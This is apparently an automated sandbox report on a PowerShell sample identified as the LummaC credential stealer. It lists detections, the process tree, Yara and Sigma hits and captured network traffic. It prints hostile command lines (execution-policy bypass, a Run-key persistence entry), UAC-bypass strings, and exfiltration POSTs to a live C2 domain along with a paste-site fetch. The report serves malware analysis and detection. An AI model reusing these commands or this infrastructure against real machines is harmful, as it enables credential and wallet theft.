Windows Analysis Report
IaslcsMo.ps1

Overview

General Information

Sample name: IaslcsMo.ps1
Analysis ID: 1562214
MD5: d7c9613ed12144aea20bee90fd5057e5
SHA1: 268f3d77e4b82f68c842a4c01f96a6ba864c09fb
SHA256: aa22e017141e1c5974e00c72f2de158072cf9279cfedff86ac1734c6947a19e8

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 1856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Set-up.exe (PID: 5052 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
      • more.com (PID: 3592 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 2232 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • powershell.exe (PID: 6428 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Set-up.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • more.com (PID: 1272 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • Set-up.exe (PID: 6048 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
  • cleanup
{"C2 url": ["marchhappen.cyou"], "Build id": "MeHdy4--pl8vs06"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000003.2177293553.0000000003427000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000009.00000003.2238461589.000000000342F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000A.00000002.2192626392.0000000004397000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000009.00000003.2199449864.0000000003423000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000009.00000003.2238430241.0000000003428000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
13.2.msiexec.exe.513aacd.6.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
13.2.msiexec.exe.513aacd.6.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
• 0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• 0x1ddb2:$s1: CoGetObject
• 0x1dd0b:$s2: Elevation:Administrator!new:
9.2.msiexec.exe.51e06cd.5.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
9.2.msiexec.exe.51e06cd.5.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
• 0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• 0x1d1b2:$s1: CoGetObject
• 0x1d10b:$s2: Elevation:Administrator!new:
10.2.more.com.439da00.4.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_1856.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
                    • 0x1dbbdd3:$b1: ::WriteAllBytes(
                    • 0x1dbbd9f:$b2: ::FromBase64String(
                    • 0x1dc9fac:$s1: -join
                    • 0x1dc3758:$s4: +=
                    • 0x1dc381a:$s4: +=
                    • 0x1dc7a41:$s4: +=
                    • 0x1dc9b5e:$s4: +=
                    • 0x1dc9e48:$s4: +=
                    • 0x1dc9f8e:$s4: +=
                    • 0x1dd4e19:$s4: +=
                    • 0x1dd4f1d:$s4: +=
                    • 0x1dd8379:$s4: +=
                    • 0x1dd8a59:$s4: +=
                    • 0x1dd8f0f:$s4: +=
                    • 0x1dd8f64:$s4: +=
                    • 0x1dd91d8:$s4: +=
                    • 0x1dd9207:$s4: +=
                    • 0x1dd974f:$s4: +=
                    • 0x1dd977e:$s4: +=
                    • 0x1dd985d:$s4: +=
                    • 0x1ddbaf4:$s4: +=

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2232, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", ProcessId: 6428, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2232, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", ProcessId: 6428, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", ProcessId: 1856, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1856, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.2.224, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2232, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1856, TargetFilename: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", ProcessId: 1856, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T10:54:27.181198+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:29.847246+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:32.277939+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:34.691302+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:37.092994+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:40.740867+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:44.455907+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:48.033683+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:50.166527+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49761 | 172.67.75.40 | 443 | TCP
2024-11-25T10:54:27.904326+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:30.605000+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:48.760831+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:27.904326+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:30.605000+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | TCP
2024-11-25T10:54:42.656039+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 104.21.2.224 | 443 | TCP


                    AV Detection

Source: https://marchhappen.cyou/api | Avira URL Cloud: Label: malware
Source: more.com.3592.6.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["marchhappen.cyou"], "Build id": "MeHdy4--pl8vs06"}
Source: C:\Users\user\AppData\Local\Temp\wpkoqtsrt | ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\yhg | ReversingLabs: Detection: 62%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\wpkoqtsrt | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yhg | Joe Sandbox ML: detected
Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String decryptor: marchhappen.cyou
Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_40ee719a-a

                    Exploits

Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: more.com PID: 3592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 2212, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49761 version: TLS 1.2
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Set-up.exe, 00000008.00000002.2146378325.000000006BB51000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: msvcp100.i386.pdb source: Set-up.exe, Set-up.exe, 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdbGCTL source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdb source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: Set-up.exe, 00000005.00000002.2039669387.000000006F031000.00000020.00000001.01000000.0000000A.sdmp, Set-up.exe, 00000008.00000002.2170359070.000000006F031000.00000020.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe | Code function: 5_2_6BB781A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose | 5_2_6BB781A1
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe | Code function: 5_2_6BBAC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose | 5_2_6BBAC8FD
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe | Code function: 5_2_6BBACC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose | 5_2_6BBACC23
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe | Code function: 4x nop then or byte ptr [edi], dh | 5_2_6BB67270

                    Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49755 -> 104.21.2.224:443
Source: Malware configuration extractor | URLs: marchhappen.cyou
Source: unknown | DNS query: name: rentry.co
Source: Joe Sandbox View | IP Address: 172.67.75.40 172.67.75.40
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.2.224:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49761 -> 172.67.75.40:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=604ZQ9UOTHV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18123 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WAFYLO6NK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8732 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=AWZPLICSBP | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20391 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3JYEH0QNJIX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1215 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TEDY2270QJS4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 553634 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 84 | Host: marchhappen.cyou
Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic, DNS traffic detected: DNS query: marchhappen.cyou
                    Source: global traffic, DNS traffic detected: DNS query: rentry.co
